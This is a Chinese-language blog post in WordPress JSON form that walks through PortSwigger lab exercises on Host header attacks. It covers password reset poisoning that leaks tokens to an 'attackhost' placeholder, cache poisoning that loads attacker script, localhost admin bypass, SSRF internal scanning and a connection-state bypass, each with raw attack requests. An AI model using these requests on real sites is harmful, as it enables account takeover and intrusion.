Host header\u7684\u76ee\u7684\u662f\u5e6b\u52a9\u8b58\u5225\u5ba2\u6236\u7aef\u60f3\u8981\u8207\u54ea\u500b\u5f8c\u7aef\u5143\u4ef6\u9032\u884c\u901a\u8a0a\uff0c\u7279\u5225\u662f\u540c\u4e00 IP \u4f4d\u5740\u5b58\u53d6\u591a\u500b\u7db2\u7ad9\u548c\u61c9\u7528\u7a0b\u5f0f\uff0c\u800c\u9019\u7a2e\u65b9\u5f0f\u4e5f\u8d8a\u4f86\u8d8a\u5e38\u898b\uff0c\u4ee5\u4e0b\u662f\u5e38\u898b\u7684host header\u7528\u6cd5<\/p>\n\n\n\n
<\/p>\n\n\n\n
Host header\u653b\u64ca\u7684\u539f\u7406\u662f\u5229\u7528\u7db2\u7ad9\u6c92\u6709\u5b89\u5168\u7684\u8655\u7406host header\u3002\u5982\u679c\u4f3a\u670d\u5668\u4fe1\u4efbHost header\uff0c\u4e14\u7121\u6cd5\u6b63\u78ba\u9a57\u8b49\u6216\u8f49\u7fa9\u5b83\uff0c\u5247\u653b\u64ca\u8005\u80fd\u5920\u4f7f\u7528\u6b64\u5f31\u9ede\u6ce8\u5165\u60e1\u610f\u5167\u5bb9\u64cd\u7e31\u4f3a\u670d\u5668\u7aef\u884c\u70ba\uff0c\u5e38\u898b\u7684\u653b\u64ca\u624b\u6cd5\u5982\u4e0b<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5982\u679chost\u80fd\u6539\u8b8a\u91cd\u7f6e\u5bc6\u78bc\u9023\u7d50\u4f4d\u7f6e\uff0c\u5c31\u53ef\u4ee5\u91cd\u7f6e\u5176\u4ed6\u5e33\u6236\u7684\u5bc6\u78bc<\/p>\n\n\n\n
\u8209\u4f8b\u4f86\u8aaa\uff0c\u91cd\u8a2dwiener\u7684\u5bc6\u78bc\uff0c\u6b63\u5e38\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n
POST \/forgot-password HTTP\/1.1\nHost: ac1f1ffb1f9803ae8051074b00840063.web-security-academy.net\n...omit...\ncsrf=szHcBtBH1NE45ojxzfC6RZwFOW1bFvUK&username=wiener<\/code><\/pre>\n\n\n\nwiener\u6703\u6536\u5230EMAIL\uff0c\u5167\u542b\u91cd\u8a2d\u5bc6\u78bc\u9023\u7d50\uff0c\u800c\u8a72\u9023\u7d50\u662f\u7531host\u7684\u540d\u7a31\u7522\u751f\u7684<\/p>\n\n\n\n
https:\/\/ac1f1ffb1f9803ae8051074b00840063.web-security-academy.net\/forgot-password?temp-forgot-password-token=hibaemuoGikE0EFPmL2NJysIW7ITQrR3<\/code><\/p>\n\n\n\n\u53ea\u8981\u8a2a\u554f\u8a72\u9023\u7d50\uff0c\u5c31\u80fd\u66f4\u6539wiener\u7684\u5bc6\u78bc<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u7531\u65bc\u91cd\u7f6e\u5bc6\u78bc\u9023\u7d50\u662f\u7531host\u7684\u540d\u7a31\u7522\u751f\u7684\uff0c\u56e0\u6b64\u53ef\u900f\u904e\u66f4\u6539host\u4f86\u6539\u8b8a\u91cd\u7f6e\u5bc6\u78bc\u9023\u7d50\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
\u5982\u4e0b\uff0c\u5c07HOST\u63db\u6210attackhost \uff0c\u4e26\u5c07\u5c0d\u8c61\u6539\u70bacarlos\u5f8c\u9001\u51fa<\/p>\n\n\n\n
POST \/forgot-password HTTP\/1.1\nHost: attackhost\n...omit...\ncsrf=szHcBtBH1NE45ojxzfC6RZwFOW1bFvUK&username=carlos<\/code><\/pre>\n\n\n\ncarlos\u5c31\u6703\u6536\u5230\u5167\u542b\u91cd\u8a2d\u5bc6\u78bc\u9023\u7d50\u7684email\uff0c\u4e00\u65e6\u89f8\u767c\u8a72\u9023\u7d50\uff0c\u5c31\u6703\u5728attackhost \u7559\u4e0b\u8a18\u9304<\/p>\n\n\n\n
\u67e5\u770battackhost\u7684\u65e5\u5fd7\uff0c\u5c31\u6703\u767c\u73fe\u6709\u91cd\u8a2dcarlos\u5bc6\u78bc\u7684token <\/p>\n\n\n\n
...omit...\n\"GET \/forgot-password?temp-forgot-password-token=uNQWMvdzD999NewFNqUQdDeno2CjzUtc HTTP\/1.1\" 302\n...omit...<\/code><\/pre>\n\n\n\n\u53ea\u8981\u8a2a\u554f\u6539\u5bc6\u78bc\u7684\u9023\u7d50\u642d\u914duNQWMvdzD999NewFNqUQdDeno2CjzUtc \uff0c\u5c31\u80fd\u6539carlos\u7684\u5bc6\u78bc\uff0c\u5982\u4e0b<\/p>\n\n\n\n
https:\/\/ac1f1ffb1f9803ae8051074b00840063.web-security-academy.net\/forgot-password?temp-forgot-password-token=uNQWMvdzD999NewFNqUQdDeno2CjzUtc<\/code><\/p>\n\n\n\nlab:Basic password reset poisoning<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u5229\u7528\u7b2c2\u500bhost\u5feb\u53d6\u6295\u6bd2<\/h2>\n\n\n\n
\u5982\u679c\u767c\u73fe\u7b2c\uff12\u500bhost\u5167\u5bb9\u6703\u51fa\u73fe\u5728\u8fd4\u56de\u7d50\u679c\u4e2d\uff0c\u90a3\u5c31\u53ef\u4ee5\u5c0d\u76ee\u6a19\u505a\u5feb\u53d6\u6295\u6bd2\uff0c\u5982\u4e0b<\/p>\n\n\n\n
############## attack request #############\n\tGET \/ HTTP\/1.1\n\tHost: ac5c1fd31e485e0b800754bc00f00060.web-security-academy.net\n\tHost: attackhost\n\t...omit...\n\n############## attack response #############\n\tHTTP\/1.1 200 OK\n\tContent-Type: text\/html; charset=utf-8\n\tKeep-Alive: timeout=0\n\tCache-Control: max-age=30\n\tAge: 7\n\tX-Cache: hit\n\t...omit...\n\t <script type=\"text\/javascript\" src=\"\/\/attackhost\/resources\/js\/tracking.js\"><\/script>\n\t...omit...<\/code><\/pre>\n\n\n\n\u53ea\u8981\u5728attackhost\/resources\/js\/tracking.js\u6e96\u5099\u653b\u64ca\u4ee3\u78bc\uff0c\u5c31\u53ef\u5229\u7528\u5feb\u53d6\u6295\u6bd2\u653b\u64ca<\/p>\n\n\n\n
\u4f8b\u5982\uff0c\u60f3\u986f\u793acookie\uff0c\u6211\u5c31\u53ef\u4ee5\u5728\u9019\u4ee3\u78bc\u5167\u5bebalert(document.cookie)<\/code><\/p>\n\n\n\nLab: Web cache poisoning via ambiguous requests<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u9952\u904e\u9632\u554f\u9650\u5236<\/h2>\n\n\n\n
\u8a2a\u554fadmin\u6642\u8fd4\u56de\u53ea\u9650\u672c\u5730\u8a2a\u554f<\/p>\n\n\n\n
############## request #############\nhttps://ac801f621fff3b37806a2e2e009a00b5.web-security-academy.net\/admin\n\n...omit...\n\n############## response #############\n...omit...\nAdmin interface only available to local users<\/code><\/pre>\n\n\n\n\u56e0\u70ba\u76ee\u6a19\u5b58\u5728\u6f0f\u6d1e\uff0c\u56e0\u6b64\u5c07host\u6539\u70ba\u672c\u5730\u5373\u53ef\u7b26\u5408\u76ee\u6a19\u9700\u6c42\uff0c\u6210\u529f\u9952\u904e\u4fdd\u8b77\u8a2a\u554fadmin<\/p>\n\n\n\n
https://ac801f621fff3b37806a2e2e009a00b5.web-security-academy.net\/admin\nhost: localhost\n...omit...<\/code><\/pre>\n\n\n\nLab: Host header authentication bypass<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u900f\u904eSSRF\u5c0b\u627e\u53ef\u7528\u7684\u653b\u64ca\u76ee\u6a19<\/h2>\n\n\n\n
\u66f4\u6539host\u540d\u7a31\u70ba\u5176\u4ed6\u4e3b\u6a5f\u4e26\u767c\u9001\u8acb\u6c42\u6642\uff0c\u5176\u4ed6\u4e3b\u6a5f\u80fd\u6536\u5230\u8acb\u6c42\uff0c\u9019\u8868\u793a\u5b58\u5728SSRF\u554f\u984c\uff0c<\/p>\n\n\n\n
\u8209\u4f8b\u5982\u4e0b\uff0c\u8acb\u6c42\u6642\u5c07host\u6539\u70baCollaboratorclienturl<\/p>\n\n\n\n
GET \/ HTTP\/1.1\nHost: Collaboratorclienturl\n...omit...<\/code><\/pre>\n\n\n\n\u5728Collaboratorclienturl\u4e3b\u6a5f\u4e2d\u6703\u770b\u5230\u525b\u525b\u8acb\u6c42\u7684\u65e5\u5fd7 <\/p>\n\n\n\n
\u5047\u5982\u6211\u77e5\u9053\u76ee\u6a19\u7db2\u6bb5\u70ba192.168.0.0\/24\uff0c\u5c31\u53ef\u5229\u7528host\u767c\u52d5SSRF\u505aIP\u6383\u63cf<\/p>\n\n\n\n
\u5982\u4e0b\uff0c\u5c07Host\u8a2d\u70ba192.168.0.1\u4e26\u9001\u51fa\u8acb\u6c42\uff0c\u4e26\u91cd\u8986\u4e00\u76f4\u5230192.168.0.255<\/p>\n\n\n\n
GET \/ HTTP\/1.1\n Host: 192.168.0.1\n ...omit...<\/code><\/pre>\n\n\n\n\u4e00\u65e6\u8fd4\u56de\u767c\u73fe\u7d50\u679c\uff0c\u5c31\u53ef\u4ee5\u5c0d\u8a72\u76ee\u6a19\u898f\u5283\u5f8c\u7e8c\u653b\u64ca\u6d3b\u52d5<\/p>\n\n\n\n
############## request #############\nGET \/\nHost: 192.168.0.245\n...omit...\t\n\n############## response #############\nHTTP\/1.1 302 Found\nLocation: \/admin\nConnection: close\nContent-Length: 0<\/code><\/pre>\n\n\n\nLab: Routing-based SSRF<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5176\u4ed6\u88dc\u5145<\/h2>\n\n\n\n\u5229\u7528\u6709\u7f3a\u9677\u7684\u8acb\u6c42\u9952\u904e\u4fdd\u8b77\u6a5f\u5236<\/h3>\n\n\n\n
\u6709\u6642\u5019\u6703\u767c\u73fe\u6539host\u5f8c\uff0c\u88ab\u76ee\u6a19\u7db2\u7ad9\u62d2\u7d55\u8a2a\u554f\uff0c\u5982\u4e0b<\/p>\n\n\n\n
############## request #############\nGET \/ HTTP\/1.1\nHost: Collaboratorclienturl\n...omit...\n\n############## response #############\nHTTP\/1.1 403 Forbidden<\/code><\/pre>\n\n\n\n\u9019\u6642\u5019\u53ef\u4ee5\u8abf\u6574\u4e0b\u8acb\u6c42\uff0c\u4f8b\u5982\u4f7f\u7528\u7d55\u5c0d\u8def\u5f91\u8a2a\u554f\uff0c\u6216\u8a31\u53ef\u4ee5\u9952\u904e\u9019\u500b\u9650\u5236\uff0c\u5982\u4e0b<\/p>\n\n\n\n
############## request #############\nGET https:\/\/ac4f1f031f2b9dfe81f1a54200720050.web-security-academy.net\/ HTTP\/1.1\nHost: Collaboratorclienturl\n...omit...\n\n############## response #############\nHTTP\/1.1 200 OK<\/code><\/pre>\n\n\n\nLab: SSRF via flawed request parsing<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u5229\u7528\u9023\u7dda\u72c0\u614b\u9952\u904ehost\u4fdd\u8b77\u6a5f\u5236<\/h3>\n\n\n\n
\u6709\u4e9b\u670d\u52d9\u5668\u8a2d\u8a08\u4e0d\u826f\uff0c\u53ef\u80fd\u50c5\u5c0d\u900f\u904e\u65b0\u9023\u7dda\u6536\u5230\u7684\u7b2c\u4e00\u500b\u8acb\u6c42\u57f7\u884c\u5fb9\u5e95\u9a57\u8b49\u7684\u4f3a\u670d\u5668\u3002\u5728\u9019\u7a2e\u60c5\u6cc1\u4e0b\uff0c\u53ef\u4ee5\u5148\u767c\u9001\u6b63\u5e38\u7684\u8acb\u6c42\uff0c\u7136\u5f8c\u5728\u900f\u904e\u76f8\u540c\u9023\u7dda\u767c\u9001\u60e1\u610f\u8acb\u6c42\u4f86\u7e5e\u904e\u4fdd\u8b77\u6a5f\u5236\u3002<\/p>\n\n\n\n
\u8209\u4f8b\u5982\u4e0b\uff0c\u6b63\u5e38\u8a2a\u554fadmin\u6703\u986f\u793a\u627e\u4e0d\u5230<\/p>\n\n\n\n
############## request #############\n\tGET \/admin\/ HTTP\/1.1\n\tHost: 0aa800dc0439cfa8c06ea77f0039001f.web-security-academy.net\n\t...omit..\n\n############## response #############\n\tHTTP\/1.1 404 Not Found\n\tContent-Type: application\/json; charset=utf-8\n\tConnection: close\n\tContent-Length: 11\n\t\n\t\"Not Found\"<\/code><\/pre>\n\n\n\n\u5c07host\u6539\u70ba192.168.0.1\u6703\u88ab\u91cd\u5c0e\u56de\u539f\u672c\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
request\n\tGET \/admin\/ HTTP\/1.1\n\tHost: 192.168.0.1\n\t...omit...\nresponse \n\tHTTP\/1.1 301 Moved Permanently\n\tLocation: https:\/\/0aa800dc0439cfa8c06ea77f0039001f.web-security-academy.net\/\n\tConnection: close\n\tContent-Length: 0<\/code><\/pre>\n\n\n\n\u4f46\u7531\u65bc\u76ee\u6a19\u6709\u9023\u7dda\u72c0\u614b\u7684\u6f0f\u6d1e\uff0c\u56e0\u6b64\u53ef\u4ee5\u5229\u7528\u9019\u500b\u554f\u984c\u53bb\u9952\u904e\u4fdd\u8b77\u6a5f\u5236\uff0c\u53ea\u8981\u5728burpsuite\u7684repeater\u4e2d\uff0c\u5c07\u4ee5\u4e0b2\u500b\u8acb\u6c42\u5408\u70ba\u4e00\u500bgroup <\/p>\n\n\n\n
\u7b2c\u4e00\u500b\u8acb\u6c42\uff0c\u8a2a\u554f\u9996\u9801\u5f8c\u52a0Connection: keep-alive<\/p>\n\n\n\n
GET \/ HTTP\/1.1\nHost: 0aa800dc0439cfa8c06ea77f0039001f.web-security-academy.net\n...omit...\nConnection: keep-alive<\/code><\/pre>\n\n\n\n\u7b2c\u4e8c\u500b\u8acb\u6c42\uff0c\u8a2a\u554fadmin\uff0c\u4e26\u66f4\u6539host\u70ba192.168.0.1<\/p>\n\n\n\n
GET \/admin HTTP\/1.1\nHost: 192.168.0.1\n...omit...<\/code><\/pre>\n\n\n\n\u4f7f\u7528single connection\u9001\u51fa\u9019\u500bgroup\u8acb\u6c42\uff0c\u7b2c\u4e8c\u500b\u8acb\u6c42\u5c31\u6703\u8fd4\u56de\u4ee5\u4e0b\u5167\u5bb9<\/p>\n\n\n\n
...omit...\n <form style='margin-top: 1em' class='login-form' action='\/admin\/delete' method='POST'>\n <input required type=\"hidden\" name=\"csrf\" value=\"z6rxSWRsEj1W8Bzdr7p6iHAUdyKKQ2Ki\">\n <label>Username<\/label>\n <input required type='text' name='username'>\n <button class='button' type='submit'>Delete user<\/button>\n <\/form>\n...omit...<\/code><\/pre>\n\n\n\n\u6210\u529f\u9952\u904e\u76ee\u6a19\u4fdd\u8b77\u6a5f\u5236<\/p>\n\n\n\n
<\/p>\n\n\n\n
Lab: Host validation bypass via connection state attack<\/p>\n","protected":false},"excerpt":{"rendered":"
Host header\u7684\u76ee\u7684\u662f\u5e6b\u52a9\u8b58\u5225\u5ba2\u6236\u7aef\u60f3\u8981\u8207\u54ea\u500b\u5f8c\u7aef\u5143 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1137","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1137","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1137"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1137\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1137"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1137"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1137"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}